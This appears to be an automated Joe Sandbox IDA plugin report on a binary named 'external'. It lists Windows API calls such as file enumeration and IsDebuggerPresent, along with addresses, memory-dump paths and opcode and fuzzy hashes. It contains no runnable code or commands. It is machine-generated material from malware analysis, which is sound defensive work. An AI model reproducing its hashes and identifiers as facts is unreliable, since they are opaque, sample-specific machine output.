                                                                                                          • API ID: Cpp_errorThrow_std::_$CallbackExclusiveFreeHandleLibraryLockModuleReleaseReturnsWhen
                                                                                                          • String ID: &p
                                                                                                          • API String ID: 1423221283-2011850372

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006F50DB
                                                                                                            • Part of subcall function 0070277A: _Yarn.LIBCPMT ref: 0070279A
                                                                                                            • Part of subcall function 0070277A: _Yarn.LIBCPMT ref: 007027BE
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Yarn$LockitLockit::_std::_
                                                                                                          • String ID: bad locale name
                                                                                                          • API String ID: 360232963-1405518554

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 0071B0D7: GetConsoleOutputCP.KERNEL32(48E58DFA,00000000,00000000,?), ref: 0071B13A
                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,0070A691,?,0070A8F3), ref: 0071AEB2
                                                                                                          • GetLastError.KERNEL32(?,0070A691,?,0070A8F3,?,0070A8F3,?,?,?,?,?,?,?,?,?,?), ref: 0071AEBC
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 2915228174-0

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,0071AE98,?,0070A8F3,?,?,?,00000000), ref: 0071B5A2
                                                                                                          • GetLastError.KERNEL32(?,0071AE98,?,0070A8F3,?,?,?,00000000,?,?,?,?,?,0070A691,?,0070A8F3), ref: 0071B5C8
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 442123175-0

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 006F48DF
                                                                                                            • Part of subcall function 006F4D90: std::_Lockit::_Lockit.LIBCPMT ref: 006F4DBE
                                                                                                            • Part of subcall function 006F4D90: std::_Lockit::~_Lockit.LIBCPMT ref: 006F4DE9
                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 006F49AB
                                                                                                          Similarity
                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                          • String ID:
                                                                                                          • API String ID: 593203224-0

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,00714B08,0072EBC0), ref: 00714C65
                                                                                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00714B08,0072EBC0), ref: 00714C77
                                                                                                          Similarity
                                                                                                          • API ID: FileHandleType
                                                                                                          • String ID:
                                                                                                          • API String ID: 3000768030-0
                                                                                                          • Opcode ID: d090aea39d700aafcc98b8f4fed2b4c57219ab735edac02f31affe5482be1097
                                                                                                          • Instruction ID: 0412bddfcfbe34c9454bb682b21e3cfacfae2203b3d7bafe457eedecd6ef6005
                                                                                                          • Opcode Fuzzy Hash: d090aea39d700aafcc98b8f4fed2b4c57219ab735edac02f31affe5482be1097
                                                                                                          • Instruction Fuzzy Hash: 8311EE71205B414AC7308E3ECCC86A2BA95AB92330B38070AD1B6966F1D23CD9C6D2E4

                                                                                                          Control-flow Graph
                                                                                                          [Control-flow graph: basic blocks 70277a-7027c5; calls to 710cd7 and 7027e0]
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Yarn
                                                                                                          • String ID:
                                                                                                          • API String ID: 1767336200-0
                                                                                                          • Opcode ID: 8cf4299cfad31ef390e30b0cc6a6882ef02ba7495ccbbdfe46edd34fd8258ae5
                                                                                                          • Instruction ID: 93f56e4d16a55d0b2fd75bb2d3fff4bfc25101b62a6cfaf46c970e96e13dee81
                                                                                                          • Opcode Fuzzy Hash: 8cf4299cfad31ef390e30b0cc6a6882ef02ba7495ccbbdfe46edd34fd8258ae5
                                                                                                          • Instruction Fuzzy Hash: 3EE0E533304214FBEB186A65AC56BB633D8DB44761F10022DFA0AD65C1ED64EC4486A5
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32 ref: 006F1BC8
                                                                                                          • GetModuleFileNameA.KERNEL32 ref: 006F1BE8
                                                                                                            • Part of subcall function 006F1890: CreateFileA.KERNELBASE ref: 006F1913
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileModule$CreateHandleName
                                                                                                          • String ID:
                                                                                                          • API String ID: 2828212432-0
                                                                                                          • Opcode ID: 4b3255685053094f3ee0fc2fa8fe7df00b8279951d67f4f9e0fdbbf5d78f44a7
                                                                                                          • Instruction ID: 23bc0eefaa3fe2fdda401691e4d41fe3797ab356b4f9b43341fd5d8c7ee56009
                                                                                                          • Opcode Fuzzy Hash: 4b3255685053094f3ee0fc2fa8fe7df00b8279951d67f4f9e0fdbbf5d78f44a7
                                                                                                          • Instruction Fuzzy Hash: 57F01DB1904208CFCB50EF78D9493EDBBF4EB18300F4185ADD4C9D7240EA7899888F86
                                                                                                          APIs
                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,00717421,?,00000000,?,?,007170C1,?,00000007,?,?,00717A07,?,?), ref: 0071319D
                                                                                                          • GetLastError.KERNEL32(?,?,00717421,?,00000000,?,?,007170C1,?,00000007,?,?,00717A07,?,?), ref: 007131A8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 485612231-0
                                                                                                          • Opcode ID: e2d79816cec898e2da316de35ae57c75cb226de812edd6c202396d184b9c9434
                                                                                                          • Instruction ID: f794e3fbebb31ffe3b8de59d3edafd783dbe62464d713257f021072ad0bf87ee
                                                                                                          • Opcode Fuzzy Hash: e2d79816cec898e2da316de35ae57c75cb226de812edd6c202396d184b9c9434
                                                                                                          • Instruction Fuzzy Hash: 0EE0CD31100608F7DF212FA4EC0DF953BA9EB44751F148424FA0C960E4D63D8E85DB88
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5f01d4543bc709305ee5daf495badc9bfac8ad4ea20d7dcaf2c558d67c3d5550
                                                                                                          • Instruction ID: 708fdd4e785b230a818ff6d71e6b20e396190cc5ddbe630bfeab16cb03af5c2d
                                                                                                          • Opcode Fuzzy Hash: 5f01d4543bc709305ee5daf495badc9bfac8ad4ea20d7dcaf2c558d67c3d5550
                                                                                                          • Instruction Fuzzy Hash: AD01B5332002159F9F128E6CFC50A9637A9FBC5721F248224FB048B1D4DA39E8C19BD5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalLeaveSection
                                                                                                          • String ID:
                                                                                                          • API String ID: 3988221542-0
                                                                                                          • Opcode ID: 9a284ff02e7f5eda972615e006501344b04785a46526e8b30b500298aa56e5bc
                                                                                                          • Instruction ID: e33ee664baa03501cf0237a7492dcbd5ab4b7fdfb49990b97d2a812786a07b9a
                                                                                                          • Opcode Fuzzy Hash: 9a284ff02e7f5eda972615e006501344b04785a46526e8b30b500298aa56e5bc
                                                                                                          • Instruction Fuzzy Hash: 790126B7708242DBCB259B7CE869BA8BBD4BF41338F20836FE042954C1CB2A5A10C350
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,007022A9,?,?,006F3E32,00001000,?,006F3D7A), ref: 007131F3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: 6d0f9d1685e8924f6550eeb25a2b1d9016a75dabd10cd8b4141e12fee5556998
                                                                                                          • Instruction ID: 082b48ae19fa0b912a5fe536c7f9c04f3b0103a6b79955b22b92f64441ad3c04
                                                                                                          • Opcode Fuzzy Hash: 6d0f9d1685e8924f6550eeb25a2b1d9016a75dabd10cd8b4141e12fee5556998
                                                                                                          • Instruction Fuzzy Hash: 80E0E531100A29F7EB312669CC05BDB768CAB027A0F100220ED09960D1CE6DCE85A1E5
                                                                                                          APIs
                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 007008F1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                          • String ID:
                                                                                                          • API String ID: 118556049-0
                                                                                                          • Opcode ID: 238d24ba721e6323cc6bf01d29c27b2a15ce58c99b8b4b94d52b965bb8bb163e
                                                                                                          • Instruction ID: 977bf36921b671a57bc41abc509eb4bc4be1de7b4721ba27f945d21d050d5d86
                                                                                                          • Opcode Fuzzy Hash: 238d24ba721e6323cc6bf01d29c27b2a15ce58c99b8b4b94d52b965bb8bb163e
                                                                                                          • Instruction Fuzzy Hash: 60E01230C0020CEBCB44EBA4D1495ADBBB5AE80320F1081A9E849A7392DB39AE54CB85
                                                                                                          APIs
                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 006FBDD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                          • String ID:
                                                                                                          • API String ID: 118556049-0
                                                                                                          • Opcode ID: a30ae68e049c7e956b783bb4e37629f1f29edf683a27e5578c88f21e457d13c9
                                                                                                          • Instruction ID: 2c468dcd6a47b3c6bc237f1261d2d6febadad33c4159cc49a03e862efb07cbaa
                                                                                                          • Opcode Fuzzy Hash: a30ae68e049c7e956b783bb4e37629f1f29edf683a27e5578c88f21e457d13c9
                                                                                                          • Instruction Fuzzy Hash: C8E04630C0020CEBCB44FBA4E1494ACBBB6AF84304F1080ADEA4967352DB31AE01CF86
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __floor_pentium4
                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                          • Opcode ID: 1447b2eba109047aa95ba83af16117281ed49386415704d8d7c8fb2c0f0aff18
                                                                                                          • Instruction ID: 0cc8e531a7e131dede222840359f951dca726157a72215f9298470269cdd8892
                                                                                                          • Opcode Fuzzy Hash: 1447b2eba109047aa95ba83af16117281ed49386415704d8d7c8fb2c0f0aff18
                                                                                                          • Instruction Fuzzy Hash: E4D22871E082298FDB64CE28DD447EAB7B5EB44305F1441EAD84DE7281E778AEC58F81
                                                                                                          APIs
                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,00718515,00000002,00000000,?,?,?,00718515,?,00000000), ref: 00718BDD
                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,00718515,00000002,00000000,?,?,?,00718515,?,00000000), ref: 00718C06
                                                                                                          • GetACP.KERNEL32(?,?,00718515,?,00000000), ref: 00718C1B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoLocale
                                                                                                          • String ID: ACP$OCP
                                                                                                          • API String ID: 2299586839-711371036
                                                                                                          • Opcode ID: 94f138b75d630d16067f78f7ccb9991025a6ab521358c64d4211fd93296a1692
                                                                                                          • Instruction ID: 71c8ebbc57582fb01e2688baa69545a6fac356f0138d082339122bdd17c84393
                                                                                                          • Opcode Fuzzy Hash: 94f138b75d630d16067f78f7ccb9991025a6ab521358c64d4211fd93296a1692
                                                                                                          • Instruction Fuzzy Hash: A321C8E2705100EADBB08F5CC941AD773A7EF54B60B568465E909D7180EF3ADEC1D3A1
                                                                                                          APIs
                                                                                                            • Part of subcall function 00713413: GetLastError.KERNEL32(00000000,?,00715749), ref: 00713417
                                                                                                            • Part of subcall function 00713413: SetLastError.KERNEL32(00000000,?,?,00000028,0070F7C9), ref: 007134B9
                                                                                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 007184E7
                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00718525
                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00718538
                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00718580
                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0071859B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 415426439-0
                                                                                                          • Opcode ID: 35186f5f226fe83bfbe87283f94b34fee7a06e8fc5186bd9c839996057cc0a1f
                                                                                                          • Instruction ID: c37e417dcd0bcd9122443a1a5cd71c1581af3c72d7ba7c09aaf14673aa8f704e
                                                                                                          • Opcode Fuzzy Hash: 35186f5f226fe83bfbe87283f94b34fee7a06e8fc5186bd9c839996057cc0a1f
                                                                                                          • Instruction Fuzzy Hash: 9D516071900246ABDB60DFA8DC45AFE77B9FF08700F144469E915E71D0EF789A80CB62
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e210328f8d4f359fac80214519e11883391db29b0651a67b32ed7d6b3dc8e133
                                                                                                          • Instruction ID: 8a82c7908ac643e785245b455b7d014d32c89a4dd77e46984c73183db909c5d2
                                                                                                          • Opcode Fuzzy Hash: e210328f8d4f359fac80214519e11883391db29b0651a67b32ed7d6b3dc8e133
                                                                                                          • Instruction Fuzzy Hash: 8D022B71E012199BDF14CFADD8806EEBBF1FF48314F648269DA15AB381D735AA41CB90
                                                                                                          APIs
                                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00719216
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0071930A
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00719349
                                                                                                          • FindClose.KERNEL32(00000000), ref: 0071937C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$CloseFile$FirstNext
                                                                                                          • String ID:
                                                                                                          • API String ID: 1164774033-0
                                                                                                          • Opcode ID: d6d3f1421eda75ac8929441e21d47f70e643bb0b544338b12bc66637d4507d3b
                                                                                                          • Instruction ID: c0be63dfb6a4b8c12b1e655d43b8cd8e17ce6f82934873bd59847b515c3457c6
                                                                                                          • Opcode Fuzzy Hash: d6d3f1421eda75ac8929441e21d47f70e643bb0b544338b12bc66637d4507d3b
                                                                                                          • Instruction Fuzzy Hash: 7B711571C0415DAFDF20AF2C8CADAFAB7B9AB05300F1441D9E15D97291DA399EC29F14
                                                                                                          APIs
                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00706534
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00706600
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00706619
                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00706623
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1675399088.00000000006F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006F0000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.1675364007.00000000006F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675448675.0000000000724000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675470077.000000000072F000.00000040.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675490575.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675517498.0000000000734000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675536772.0000000000737000.00000008.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.1675577090.000000000077E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6f0000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                          • String ID:
                                                                                                          • API String ID: 254469556-0
                                                                                                          • Opcode ID: 78175d207d574091934a7592aa1e842fcd458cb9563c0b0ff874f39b307ac418
                                                                                                          • Instruction ID: 60aed01625e13709d38a3d8480c7bef8ced1dbc0eed13e12807bfa5d5dfc11fc
